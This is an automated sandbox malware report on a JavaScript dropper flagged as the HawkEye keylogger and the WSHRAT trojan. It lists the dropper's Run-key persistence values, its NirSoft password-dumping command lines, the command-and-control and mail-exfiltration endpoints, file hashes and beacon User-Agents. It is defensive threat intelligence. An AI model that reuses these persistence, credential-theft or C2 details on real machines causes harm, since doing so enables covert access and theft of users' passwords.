Malware Analysis Report

2025-04-14 08:28

Sample ID 210929-etkycadef4
Target Scano005110.js
SHA256 052a6543d8392cf4c54e7f88f80b41f571ea4e937e3caa6fa9b42a860b40b30c
Tags
hawkeye wshrat keylogger persistence spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

052a6543d8392cf4c54e7f88f80b41f571ea4e937e3caa6fa9b42a860b40b30c

Threat Level: Known bad

The file Scano005110.js was found to be: Known bad.

Malicious Activity Summary

hawkeye wshrat keylogger persistence spyware stealer trojan

HawkEye

WSHRAT

NirSoft MailPassView

NirSoft WebBrowserPassView

Nirsoft

Blocklisted process makes network request

Executes dropped EXE

Uses the VBS compiler for execution

Drops startup file

Loads dropped DLL

Looks up external IP address via web service

Adds Run key to start application

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Kills process with taskkill

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Script User-Agent

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-09-29 04:13

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-09-29 04:13

Reported

2021-09-29 04:17

Platform

win7v20210408

Max time kernel

150s

Max time network

181s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\Scano005110.js

Signatures

HawkEye

keylogger trojan stealer spyware hawkeye

WSHRAT

trojan wshrat

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\fthost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scano005110.js C:\Windows\system32\wscript.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scano005110.js C:\Windows\system32\wscript.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\fthost.exe N/A

Uses the VBS compiler for execution

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\software\microsoft\windows\currentversion\run C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\Scano005110 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\Scano005110.js\"" C:\Windows\system32\wscript.exe N/A
Key created \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Scano005110 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\Scano005110.js\"" C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe" C:\Users\Admin\AppData\Roaming\Windows Update.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A whatismyipaddress.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1308 set thread context of 1836 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1308 set thread context of 396 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Enumerates physical storage devices

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1052 wrote to memory of 828 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\fthost.exe
PID 1052 wrote to memory of 828 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\fthost.exe
PID 1052 wrote to memory of 828 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\fthost.exe
PID 1052 wrote to memory of 828 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\fthost.exe
PID 828 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\fthost.exe C:\Users\Admin\AppData\Roaming\Windows Update.exe
PID 828 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\fthost.exe C:\Users\Admin\AppData\Roaming\Windows Update.exe
PID 828 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\fthost.exe C:\Users\Admin\AppData\Roaming\Windows Update.exe
PID 828 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\fthost.exe C:\Users\Admin\AppData\Roaming\Windows Update.exe
PID 828 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\fthost.exe C:\Users\Admin\AppData\Roaming\Windows Update.exe
PID 828 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\fthost.exe C:\Users\Admin\AppData\Roaming\Windows Update.exe
PID 828 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\fthost.exe C:\Users\Admin\AppData\Roaming\Windows Update.exe
PID 1308 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1308 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1308 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1308 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1308 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1308 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1308 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1308 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1308 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1308 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1308 wrote to memory of 396 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1308 wrote to memory of 396 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1308 wrote to memory of 396 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1308 wrote to memory of 396 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1308 wrote to memory of 396 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1308 wrote to memory of 396 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1308 wrote to memory of 396 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1308 wrote to memory of 396 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1308 wrote to memory of 396 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1308 wrote to memory of 396 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\Scano005110.js

C:\Users\Admin\AppData\Local\Temp\fthost.exe

"C:\Users\Admin\AppData\Local\Temp\fthost.exe"

C:\Users\Admin\AppData\Roaming\Windows Update.exe

"C:\Users\Admin\AppData\Roaming\Windows Update.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"

Network

Country Destination Domain Proto
US 8.8.8.8:53 astatech-cn.com udp
GB 78.110.166.82:80 astatech-cn.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 8.8.8.8:53 whatismyipaddress.com udp
US 104.16.154.36:80 whatismyipaddress.com tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 8.8.8.8:53 mail.legacypharma.com.pk udp
DE 49.12.122.233:587 mail.legacypharma.com.pk tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp
DE 49.12.122.233:587 mail.legacypharma.com.pk tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp
US 192.3.53.74:7121 192.3.53.74 tcp

Files

memory/828-59-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\fthost.exe

MD5 a0f830df411d0bd29cc9417c61e32be5
SHA1 c03c055c20f08ff9da4ccb56433c722eb981d088
SHA256 ded7aa698a9f7a28de12e9a68e69b8fa666474af3e85ca8e2b133cb6ad8cdcfa
SHA512 e774634596b5b007445e6a1b75f40e178125c71fee4d6bd61f55c03f8f5e3f8f3ccabbf369781e9a0a76fe09e93e06b89943614c5c59d091b699488406c5bf2e

C:\Users\Admin\AppData\Local\Temp\fthost.exe

MD5 a0f830df411d0bd29cc9417c61e32be5
SHA1 c03c055c20f08ff9da4ccb56433c722eb981d088
SHA256 ded7aa698a9f7a28de12e9a68e69b8fa666474af3e85ca8e2b133cb6ad8cdcfa
SHA512 e774634596b5b007445e6a1b75f40e178125c71fee4d6bd61f55c03f8f5e3f8f3ccabbf369781e9a0a76fe09e93e06b89943614c5c59d091b699488406c5bf2e

memory/828-62-0x0000000074D91000-0x0000000074D93000-memory.dmp

memory/828-63-0x00000000005B0000-0x00000000005B1000-memory.dmp

\Users\Admin\AppData\Roaming\Windows Update.exe

MD5 a0f830df411d0bd29cc9417c61e32be5
SHA1 c03c055c20f08ff9da4ccb56433c722eb981d088
SHA256 ded7aa698a9f7a28de12e9a68e69b8fa666474af3e85ca8e2b133cb6ad8cdcfa
SHA512 e774634596b5b007445e6a1b75f40e178125c71fee4d6bd61f55c03f8f5e3f8f3ccabbf369781e9a0a76fe09e93e06b89943614c5c59d091b699488406c5bf2e

memory/1308-65-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Windows Update.exe

MD5 a0f830df411d0bd29cc9417c61e32be5
SHA1 c03c055c20f08ff9da4ccb56433c722eb981d088
SHA256 ded7aa698a9f7a28de12e9a68e69b8fa666474af3e85ca8e2b133cb6ad8cdcfa
SHA512 e774634596b5b007445e6a1b75f40e178125c71fee4d6bd61f55c03f8f5e3f8f3ccabbf369781e9a0a76fe09e93e06b89943614c5c59d091b699488406c5bf2e

C:\Users\Admin\AppData\Roaming\Windows Update.exe

MD5 a0f830df411d0bd29cc9417c61e32be5
SHA1 c03c055c20f08ff9da4ccb56433c722eb981d088
SHA256 ded7aa698a9f7a28de12e9a68e69b8fa666474af3e85ca8e2b133cb6ad8cdcfa
SHA512 e774634596b5b007445e6a1b75f40e178125c71fee4d6bd61f55c03f8f5e3f8f3ccabbf369781e9a0a76fe09e93e06b89943614c5c59d091b699488406c5bf2e

memory/1308-69-0x0000000000350000-0x0000000000351000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\SysInfo.txt

MD5 3c77678429c241c59376b4b284bfa90f
SHA1 5e23f969a6e5071334c2fff7c1a5cc8b4a1f0633
SHA256 d4408efc9b2e8d03cc3ed7234204c241acd033aa6014ae1804c1df3ffcc8e9f1
SHA512 f8853fbe92f7b3cf13270ebbcc281226a59a522c8b9dc6b87f9c74168f4dec8eb4db7f952887cf86591bbfbce9768c14d4dec75af41200842ac5611a4fe7a0c1

memory/1308-71-0x0000000000366000-0x0000000000367000-memory.dmp

memory/1836-72-0x0000000000400000-0x000000000041B000-memory.dmp

memory/1836-73-0x0000000000411654-mapping.dmp

memory/1836-75-0x0000000000400000-0x000000000041B000-memory.dmp

memory/396-77-0x0000000000442628-mapping.dmp

memory/396-76-0x0000000000400000-0x0000000000458000-memory.dmp

memory/396-79-0x0000000000400000-0x0000000000458000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\holderwb.txt

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Analysis: behavioral2

Detonation Overview

Submitted

2021-09-29 04:13

Reported

2021-09-29 04:16

Platform

win10-en-20210920

Max time kernel

147s

Max time network

155s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\Scano005110.js

Signatures

HawkEye

keylogger trojan stealer spyware hawkeye

WSHRAT

trojan wshrat

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scano005110.js C:\Windows\system32\wscript.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scano005110.js C:\Windows\system32\wscript.exe N/A

Uses the VBS compiler for execution

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\software\microsoft\windows\currentversion\run C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Scano005110 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\Scano005110.js\"" C:\Windows\system32\wscript.exe N/A
Key created \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Scano005110 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\Scano005110.js\"" C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe" C:\Users\Admin\AppData\Roaming\Windows Update.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A whatismyipaddress.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2004 set thread context of 1972 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2004 set thread context of 600 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Enumerates physical storage devices

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
